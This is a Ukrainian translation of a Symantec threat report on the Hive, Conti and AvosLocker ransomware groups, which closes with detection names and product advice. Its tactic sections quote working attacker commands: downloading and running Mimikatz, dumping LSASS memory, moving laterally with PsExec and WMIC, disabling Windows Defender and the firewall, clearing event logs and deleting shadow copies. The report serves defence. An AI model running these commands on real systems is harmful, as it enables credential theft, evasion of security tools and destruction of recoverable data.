Програми-вимагачі: як зловмисники зламують корпоративні мережі

Цільові атаки програм-вимагачів залишаються одним із найсерйозніших кіберризиків, з якими стикаються організації всіх розмірів. Тактика, що використовується зловмисниками-вимагачами, постійно розвивається, але, визначаючи найбільш вживані інструменти, тактики і процедури (TTP), організації можуть отримати глибше розуміння того, як ransomware проникають в мережі, і використовувати ці знання для виявлення та визначення пріоритетних слабких місць .

Symantec, підрозділ Broadcom Software, відстежує різні загрози, пов’язані зі здирницьким ПЗ, однак у більшості останніх атак спостерігаються наступні три сімейства здирницьких програм:

· Hive

· Conti

· Avoslocker

Подібно до багатьох інших сімей програм-вимагачів, Hive, Conti і Avoslocker слідують бізнес-моделі «програми-вимагачі як послуга» (RaaS). У моделі RaaS оператори програм-вимагачів наймають афілійованих осіб, які відповідають за проведення атак ransomware від їхнього імені. У більшості випадків вони дотримуються сценарію, що містить докладні кроки атаки, викладені операторами програм-вимагачів.

Після отримання початкового доступу до мережі жертв Hive, Conti та Avoslocker використовують безліч TTP, щоб допомогти своїм операторам досягти наступного:

· Досягти постійної присутності в мережі.                                                                                                                                         

· Підвищення привілеїв.

· Втручання в ПЗ безпеки та ухилення від нього.

· Бічне переміщення по мережі.

Початковий доступ

Афілійовані оператори ransomware Hive, Conti та Avoslocker використовують різні методи, щоб закріпитися у мережах жертв. Деякі з цих методів включають:

· Цільовий фішинг, що призводить до поширення шкідливого ПЗ, включаючи, але не обмежуючись цим:

   - IcedID

   - Emotet

   - QakBot

   - TrickBot

· Використання переваг слабких облікових даних RDP

· Використання таких уразливостей, як:

   o Microsoft Exchange vulnerabilities – CVE-2021-34473, CVE-2021-34523, CVE-2021-31207, CVE-2021-26855

   - FortiGate firewall vulnerabilities – CVE-2018-13379 і CVE-2018-13374

   - Apache Log4j vulnerabily – CVE-2021-44228

У більшості випадків фішингові листи містять вкладення документів Microsoft Word з макросами, які призводять до встановлення однієї з раніше згаданих шкідливих програм. У деяких випадках зловмисники використовують цю шкідливу програму для встановлення Cobalt Strike, яка використовується для перекидання на інші системи в мережі. Потім ці загрози використовуються для розповсюдження програм-здирників на зламаних комп’ютерах.

Наполегливість

Після отримання початкового доступу Symantec спостерігала, як афілійовані особи всіх трьох сімейств здирницьких програм використовують стороннє програмне забезпечення, таке як AnyDesk і ConnectWise Control (раніше відоме як ScreenConnect), щоб зберегти доступ до мереж жертв. Вони також включають стандартний доступ до віддаленого робочого столу у брандмауері:

netsh advfirewall firewall set rule group=”Remote Desktop” new enable=yes

Відомо також, що зловмисники створюють додаткових користувачів на зламаних системах, щоб зберегти доступ. У деяких випадках спостерігалось, як суб’єкти загроз додають записи до реєстру, які дозволяють їм автоматично входити до системи під час перезавантаження комп’ютера:

reg add “HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon” /v DefaultUserName /t REG_SZ /d /f

reg add “HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon” /v AutoAdminLogon /t REG_SZ /d 1 /f

Відкриття

На етапі виявлення зловмисники намагаються проаналізувати мережу жертви, щоб виявити потенційні цілі. Symantec спостерігала, як вищезазначені суб’єкти ransomware використовують такі інструменти:

· ADRecon — Збирає інформацію про Active Directory та створює звіт.

· Netscan – Виявляє пристрої в мережі.

Доступ до облікових даних

Mimikatz є основним інструментом для більшості груп здирників, і Hive, Conti та Avoslocker не є винятком. Symantec спостерігав, як вони використовують версію Mimikatz для PowerShell, а також версію PE цього інструменту. Є також випадки, коли зловмисники завантажують PowerShell-версію Mimikatz з репозиторіїв GitHub:

powershell IEX((new-object net.webclient).downloadstring(‘https://raw.githubusercontent.com//Invoke-Mimikatz.ps1’));Invoke-Mimikatz -DumpCreds

Крім Mimikatz, суб’єкти загроз також скористалися нативною комбінацією rundll32 і comsvcs.dll для дампа пам’яті LSASS:

rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump lsass.dmp full

Зловмисники також створюють дамп SECURITY, SYSTEM та SAM, а потім вилучають із нього облікові дані. В окремих випадках було помічено використання taskmgr.exe для дампа пам’яті LSASS, а потім використання дампа для отримання цінних облікових даних.

Бічний рух

Зловмисники використовують такі інструменти, як PsExec, WMI та BITSAdmin, для бічного розповсюдження та запуску програм-вимагачів у мережах жертв. Також спостерігалось, як зловмисники використовують кілька інших методів для бічного переміщення по мережі.

· PsExec

psexec -accepteula @ips.txt -s -d -c CSIDL_WINDOWS\xxx.exe

· WMI

wmic/node:@C:\share$\comps1.txt/user:”user” /password:”password” process call create “cmd.exe /c bitsadmin /transfer xxx\\IP\share$\xxx.exe%APPDATA%\xxx.exe&%APPDATA%\xxx.exe”

· BITSAdmin

bitsadmin /transfer debjob /download /priority normal hxxp:///ele.dll CSIDL_WINDOWS\ele.dll

· Mimikatz

mimikatz.exe “privilege::debug” “sekurlsa::pth /user: /domain: /ntlm:”

Ухилення від захисту

Як і у випадку з низкою інших сімейств програм-вимагачів, Hive, Conti та Avoslocker також підробляють різні продукти безпеки, що заважають досягненню їхньої мети. Symantec спостерігав, як вони втручаються в роботу служб безпеки, використовуючи команди net, taskkill та sc для їхнього відключення або завершення. У деяких випадках вони також використовують такі інструменти, як PC Hunter для завершення процесів. Вони також були помічені у підробці різних записів реєстру, пов’язаних із продуктами безпеки, оскільки зміни у записах реєстру можуть зробити ці продукти непрацездатними.

Було помічено, що Hive та AvosLocker намагаються відключити Windows Defender за допомогою наступних команд reg.exe.

AvosLocker:

reg add “HKLM\SOFTWARE\Policies\Microsoft\Windows Defender” /v DisableAntiSpyware /t REG_DWORD /d 1 /f

Hive:

reg.exe delete “HKLM\Software\Policies\Microsoft\Windows Defender” /f

reg.exe add “HKLM\Software\Policies\Microsoft\Windows Defender” /v “DisableAntiSpyware” /t REG_DWORD /d “1” /f

reg.exe add “HKLM\Software\Policies\Microsoft\Windows Defender” /v “DisableAntiVirus” /t REG_DWORD /d “1” /f

reg.exe add “HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine” /v “MpEnablePus” /t REG_DWORD /d “0” /f

reg.exe add “HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection” /v “DisableBehaviorMonitoring” /t REG_DWORD /d “1” /f

reg.exe add “HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection” /v “DisableIOAVProtection” /t REG_DWORD /d “1” /f

reg.exe add “HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection” /v “DisableOnAccessProtection” /t REG_DWORD /d “1” /f

reg.exe add “HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection” /v “DisableRealtimeMonitoring” /t REG_DWORD /d “1” /f

reg.exe add “HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection” /v “DisableScanOnRealtimeEnable” /t REG_DWORD /d “1” /f

reg.exe add “HKLM\Software\Policies\Microsoft\Windows Defender\Reporting” /v “DisableEnhancedNotifications” /t REG_DWORD /d “1” /f

reg.exe add “HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet” /v “DisableBlockAtFirstSeen” /t REG_DWORD /d “1” /f

reg.exe add “HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet” /v “SpynetReporting” /t REG_DWORD /d “0” /f

reg.exe add “HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet” /v “SubmitSamplesConsent” /t REG_DWORD /d “0” /f

reg.exe add “HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger” /v “Start” /t REG_DWORD /d “0” /f

reg.exe add “HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger” /v “Start” /t REG_DWORD /d “0” /f

reg.exe delete aHKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run” /v “Windows Defender” /f

reg.exe delete “HKCU\Software\Microsoft\Windows\CurrentVersion\Run” /v “Windows Defender” /

Відключення стандартного брандмауера Windows також є одним із методів, що використовуються цими сімействами здирників:

netsh advfirewall set allprofiles state off

Щоб приховати сліди в системі жертви, зловмисники можуть також очистити журнал подій Windows:

wevtutil.exe cl system

wevtutil.exe cl security

wevtutil.exe cl application

powershell -command “Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }”

Вплив

Зловмисники зазвичай відключають або підробляють налаштування операційної системи, щоб ускладнити адміністраторам відновлення даних. Видалення тіньових копій – поширена тактика, яку суб’єкти загроз застосовують перед початком процесу шифрування. Вони виконують це завдання за допомогою таких інструментів, як Vssadmin або WMIC, і виконують одну з наступних команд:

vssadmin.exe delete shadows /all/quiet

wmic.exe shadowcopy delete

Також спостерігалось, як BCDEdit використовується для відключення автоматичного відновлення системи та ігнорування збоїв під час завантаження:

bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures

bcdedit.exe /set {default} recoveryenabled no

У деяких випадках суб’єкти видаляють налаштування безпечного режиму в реєстрі, щоб зупинити запуск служб безпеки в безпечному режимі:

reg delete HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\ /f

Ексфільтрація

Зловмисники зазвичай вилучають критично важливі дані із середовища жертви, перш ніж зашифрувати їх. Потім вони використовують вкрадені дані, намагаючись вимагати у жертв викуп. По спостереженням, зловмисники використовують для ексфільтрації даних такі хмарні послуги:

· https://anonfiles.com

· https://mega.nz

· https://send.exploit.in

· https://ufile.io

· https://www.sendspace.com

Також спостерігалося, як зловмисники використовують такі інструменти для ексфільтрації даних:

· Filezilla

· Rclone

Висновок

Описані в цьому блозі TTP є оглядом поточного ландшафту загроз, пов’язаних із здирницьким ПЗ. TTP, що використовуються цими суб’єктами загроз, постійно розвиваються, групи постійно коригують свої методи, намагаючись уникнути засобів захисту своїх цілей. Тому організаціям необхідно бути пильними та використовувати багаторівневий підхід до забезпечення безпеки.

Symantec Protection

Symantec Endpoint Protection (SEP) захищає від атак програм-вимагачів з використанням кількох статичних та динамічних технологій.

AV Protection

· Ransom.Hive

· Ransom.Conti

· Ransom.AvosLocker

· Backdoor.Cobalt

· Hacktool.Mimikatz

· Trojan.IcedID*

· Trojan.Emotet*

· W32.Qakbot*

· Trojan.Trickybot*

Behavioral Protection (Поведінковий захист)

· SONAR.RansomHive!g2

· SONAR.RansomHive!g3

· SONAR.RansomHive!g4

· SONAR.RansomAvos!g2

· SONAR.RansomConti!g1

· SONAR.RansomConti!g3

· SONAR.RansomConti!g4

· SONAR.Ransomware!g30

· SONAR.RansomGregor!g1

· SONAR.SuspLaunch!gen4

· SONAR.SuspLaunch!g18

· SONAR.Ransom!gen59

· SONAR.Ransomware!g26

· SONAR.Cryptlck!g171

Системи запобігання вторгненням (IPS)

IPS блокує початковий доступ, постійний доступ та бічне переміщення. Аудиторські підписи SEP призначені для підвищення поінформованості щодо потенційно небажаного трафіку в мережі. За замовчуванням підписи аудиту не блокуються. Адміністратори, які переглядають журнали подій IPS у своїй мережі, можуть відзначити ці події аудиту та вирішити, чи потрібно налаштовувати відповідні сигнатури аудиту для блокування трафіку.

Нижче наведено список підписів аудиту, які можуть бути включені для блокування за допомогою політик дій, пов’язаних із використанням програмного забезпечення або інструментів, таких як AnyDesk, ScreenConnect та PsExec.

· 33211 [Audit: AnyDesk Remote Desktop Activity]

· 33156 [Audit: ScreenConnect Remote Support Software Activity]

· 30068 [Audit: PSExec Utility Activity]

· 33588 [Audit: WMIC Remote RPC Interface Bind Attempt]

· 33311 [Audit: PCHunter Tool Activity]

· 33295 [Attack: Ransom.Conti Activity 3]

· 33435 [Attack: Ransom.AvosLocker Activity 3]

· 33444 [Attack: Ransom.AvosLocker Activity 4]

· 32436 [Attack: Ransom.Gen Activity 29]

· 33323 [Attack: Ransom.Hive Activity]

· 33119 [Audit: RClone Tool Activity]

Symantec рекомендує включити захист від вторгнень на всіх пристроях, включаючи сервери.

Адаптивний захист

Symantec Adaptive Protection може допомогти захиститися від бічного переміщення та методів виконання програм-вимагачів, які використовуються зловмисниками. Якщо у вашому середовищі не використовуються такі інструменти, як PsExec, WMIC та BITSAdmin, то вам слід “Заборонити” ці програми та дії за допомогою політик Symantec Adaptive Protection.

 

Рекомендації

· Клієнтам рекомендується включити систему запобігання вторгненням (IPS) на настільних комп’ютерах та серверах для забезпечення найкращого захисту. Натисніть тут для отримання інструкцій щодо увімкнення функції налаштування продуктивності IPS-сервера (IPS Server Performance Tuning). Цю функцію слід увімкнути на серверах, щоб забезпечити додаткове налаштування модуля IPS та визначень у сценаріях з високою пропускною здатністю.

· Клієнтам також рекомендується включити функцію Proactive Threat Protection, також відому як SONAR, що являє собою захист Symantec на основі поведінки.

· Клієнти також повинні підтримувати Symantec Endpoint Protection (SEP) в актуальному стані за допомогою останньої версії та набору визначень.

· Symantec має багаторівневі технології захисту від усіх типів небезпек. Щоб забезпечити найкращий захист, усі функції SEP повинні бути включені для робочих столів та серверів Windows.

З питань проведення індивідуальної демонстрації, пілотного тестування рішення Symantec і організації партнерських тренінгів звертайтеся, будь ласка:

 [email protected], +38 093 801 04 41.

Джерело: https://bit.ly/3GpqZPf